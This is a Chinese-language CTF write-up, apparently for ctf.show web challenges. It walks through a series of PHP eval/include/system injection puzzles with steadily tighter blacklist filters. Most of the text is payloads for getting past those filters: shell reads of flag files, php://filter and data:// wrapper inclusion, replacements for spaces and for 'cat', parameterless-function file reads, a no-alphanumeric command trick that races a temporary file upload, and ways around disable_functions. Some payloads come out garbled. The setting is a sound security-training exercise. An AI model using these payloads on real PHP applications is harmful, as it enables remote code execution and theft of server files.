error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
方法一:
模糊搜索
payload:?c=system(‘cat f*’);
解法二:
了解 eval函数之后
传入
c=echo “npfs”;?>ctf 可以看到有 flag.php文件,之后采用include进行包含读取
payload:
?c=echo “npfs”; ?>ctf
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
解法一:
pyaload: ?c=echo
cat f*
;
pyaload: ?c=echonl f
*;
类似cat的还有:
more,less,nl,tail
解法二:
payload:
?c=echo "npfs "; include($_GET[‘url’]); ?>&url=php://filter/read=convert.base64-encode/resource=flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
本题过滤了flag,sytem,php,cat,sort shell,.,空格,’
当cat被过滤后可以使用以下命令替代
(1)more:一页一页的显示档案内容
(2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页
(3)head:查看头几行
(4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
(5)tail:查看尾几行
(6)nl:显示的时候,顺便输出行号
(7)od:以二进制的方式读取档案内容
(8)vi:一种编辑器,这个也可以查看
(9)vim:一种编辑器,这个也可以查看
(10)sort:可以查看
(11)uniq:可以查看
(12)file -f:报错出具体内容
(13)sed:一种编辑器,这个也可以查看
当空格被过滤后可以使用以下命令替代
%09(tab)、$IFS$9、 I F S 、 {IFS}、 IFS、IFS%09(tab)、< 、<>、%20(space)
payload:
?c=echo
nl%09f*
;
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
在前面基础上又过滤了括号
使用include"$_POST[1]"?加上post传递参数利用伪协议实现绕过
paylaod
?c=include"$_POST[1]"?>
1=php://filter/read=convert.base64-encode/resource=flag.php
1
2
当然使用GET传参也能得到相同效果
payload
?c=include$_GET[“a”]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
1
传递后得到一串base64编码,解码后得到flag
flag:flag{cc9b544f-8f19-48b6-b867-b9837304f780}
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
这题在前面的基础上增加了空格,双引号的过滤。
pyaload:
?c=include%09$GET[]?>&_=php://filter/read=convert.base64-encode/resource=flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
多过滤了:
和上个payload一样。
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
多过滤了等号
payload:
?c=include%09$GET[]?>&_=php://filter/read=convert.base64-encode/resource=flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
这里多过滤了0到九
payload:
?c=include%09$GET[]?>&_=php://filter/read=convert.base64-encode/resource=flag.php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
这里已经给出了include,直接伪协议。(注意要用双引号,因为题目用单引号)
payload:
data:text/plain,
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|php|file/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
增加了php的过滤
payload:
?c=data://text,plain,baser64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs/Pg==
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c.".php");
}
}else{
highlight_file(__FILE__);
}
这里多了一个.php
然后我们直接用伪协议
payload:data:text/plain,
data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么 作用
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
基本上数字和必要的符号都被过滤了。
这里可以构造无参数函数进行文件读取。
无参数文件读取.
payload:
?c=show_source(next(array_reverse(scandir(current(localeconv())))));
c=session_start();system(session_id());
passid=ls
源代码
/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 20:03:51
# @email: [email protected]
# @link: https://ctfer.com
*/
// 你们在炫技吗?
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\, $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
这里就不细说了,因为这里我直接裂开,看大佬博客就好了。
无字母数字的命令执行
p神之无字母数字webshell之提高篇
大概思路是这样的,我们可以通过post一个文件(文件里面的sh命令),在上传的过程中,通过.(点)去执行执行这个文件。(形成了条件竞争)。一般来说这个文件在linux下面保存在/tmp/php???一般后面的6个字符是随机生成的有大小写。(可以通过linux的匹配符去匹配)
注意:通过.去执行sh命令不需要有执行权限
开搞
先自己搭建一个文件上传的网页。
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Documenttitle>
head>
<body>
<form action="http://23bd2220-6d66-4e32-9d88-cd4840491840.challenge.ctf.show:8080/" method="post" enctype="multipart/form-data">
<label for="file">文件名:label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
form>
body>
html>
同上,但是需要注意的是多上传几次,如果没有出现的话。
还是过滤了数字和字母,不仅如此,还过滤了|.|,|?|*|-|=|[意味着刚刚那题的方法以及不适应了,因为glob通配符给ban了
// 还能炫的动吗?
//flag in 36.php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
system("cat ".$c.".php");
}
}else{
highlight_file(__FILE__);
}
文章有提示,flag在36.php//flag in 36.php,所以可以想办法凑出一个36来
可以用这种操作$(()),shell中各种括号()、(())、[]、[[]]、{}的作用和区别
~在$(())中的意思是按位取反,当我再里面凑到-37的时候再取一个反就得到了36
这里我们可以通过一个小例子:
echo $(())
echo ( ( ((~ (( (())))
echo ( ( (( (((($(())))$(($(())))))
echo $((~-37))
通过上面的例子我们思路就清晰了挺多,意思就是通过-1构造出-37在取反,因为前面我们构造出来了-1,我们只需要构造37个再取反就可以了
( ( ) ) 是 0 , (()) 是0, (())是0,((~$(())))就是0取反是-1
( ( (( (((($(())))$(($(()))))) 也就是(-1-1) 等于-2
所以就堆37个 ( ( ((~ (( (())))
再取个反
源代码
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}
这里我们输入ls会报错
这里猜测是phpini开启了disable_functions这个函数
disable_functions:
PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用
然后因为我也是刚刚了解这个函数,所以我们这里参考y4和羽师傅的博客
y4
yu师傅
首先要获取文件路径,在这里我们可以用两种方式:
pyload:c=print_r(scandir(dirname(’__FILE__’)));
payload:c=$a=new DirectoryIterator(‘glob:///*’);foreach($a as $f){echo($f->__toString()." ");}
因为没有任何过滤我们便可以读取任意的文件
c=$a=opendir("./"); while (($file = readdir($a)) !== false){echo $file . “
”; };
单一函数读文件内容:
函数:
file_get_contents()
readfile()
file()
用法:
echo file_get_contents("flag.php"); //过58
readfile("flag.php"); //过58
print_r(file("flag.php")); //过59
通过fopen读文件内容:
函数:
fread()
fgets()
fgetc()
fgetss()
fgetcsv()
gpassthru()
用法:
$a=fopen("flag.php","r");while (!feof($a)) {
$line = fgetss($a);echo $line;} //php7.3版本后 该函数已不再被使用
$a=fopen("flag.php","r");echo fpassthru($a); //过59
$a=fopen("flag.php","r");echo fread($a,"1000"); //过59
$a=fopen("flag.php","r");while (!feof($a)) {
$line = fgets($a);echo $line;} //过59
$a=fopen("flag.php","r");while (!feof($a)) {
$line = fgetc($a);echo $line;} //过60
$a=fopen("flag.php","r");while (!feof($a)) {
$line = fgetcsv($a);print_r($line);} //过60
通过高亮显示文件
//通过高亮显示php文件
show_source("flag.php");
highlight_file("flag.php");